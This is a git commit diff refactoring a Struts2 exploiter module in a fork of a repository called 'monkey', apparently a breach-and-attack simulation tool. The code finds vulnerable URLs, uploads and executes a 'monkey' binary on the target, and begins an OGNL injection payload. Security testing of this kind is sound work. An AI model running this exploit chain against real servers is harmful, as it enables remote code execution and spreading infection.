forked from p15670423/monkey
Struts2 refactored for framework fixes
This commit is contained in:
parent
bbd4adf2ae
commit
6cb058eb1d
|
@ -26,45 +26,39 @@ class Struts2Exploiter(WebRCE):
|
|||
super(Struts2Exploiter, self).__init__(host)
|
||||
|
||||
def exploit_host(self):
|
||||
# We need a reference to the exploiter for WebRCE framework to use
|
||||
exploiter = self.exploit
|
||||
# Get open ports
|
||||
ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"])
|
||||
ports = self.get_ports_w(self.HTTP, ["http"])
|
||||
if not ports:
|
||||
return False
|
||||
# Get urls to try to exploit
|
||||
urls = WebRCE.build_potential_urls(self.host, ports)
|
||||
urls = self.build_potential_urls(ports)
|
||||
vulnerable_urls = []
|
||||
for url in urls:
|
||||
# Get full URL
|
||||
url = self.get_redirected(url)
|
||||
if WebRCE.check_if_exploitable(exploiter, url):
|
||||
if self.check_if_exploitable(url):
|
||||
vulnerable_urls.append(url)
|
||||
self._exploit_info['vulnerable_urls'] = vulnerable_urls
|
||||
if not vulnerable_urls:
|
||||
return False
|
||||
# We need to escape backslashes for our exploiter
|
||||
config = copy.deepcopy(self._config)
|
||||
config.dropper_target_path_win_32 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_32)
|
||||
config.dropper_target_path_win_64 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_64)
|
||||
|
||||
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
|
||||
if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
|
||||
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
||||
return True
|
||||
|
||||
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
|
||||
if not self.set_host_arch(vulnerable_urls[0]):
|
||||
return False
|
||||
|
||||
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0])
|
||||
data = self.upload_monkey(vulnerable_urls[0])
|
||||
|
||||
# We can't use 'if not' because response may be ''
|
||||
if data is not False and data['response'] == False:
|
||||
if data is not False and data['response'] is False:
|
||||
return False
|
||||
|
||||
if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False:
|
||||
if self.change_permissions(vulnerable_urls[0], data['path']) is False:
|
||||
return False
|
||||
|
||||
if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False:
|
||||
if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
|
||||
return False
|
||||
|
||||
return True
|
||||
|
@ -86,6 +80,8 @@ class Struts2Exploiter(WebRCE):
|
|||
:param cmd: Code to try and execute on host
|
||||
:return: response
|
||||
"""
|
||||
cmd = re.sub(r"\\", r"\\\\", cmd)
|
||||
cmd = re.sub(r"'", r"\\'", cmd)
|
||||
payload = "%%{(#_='multipart/form-data')." \
|
||||
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
|
||||
"(#_memberAccess?" \
|
||||
|
|
Loading…
Reference in New Issue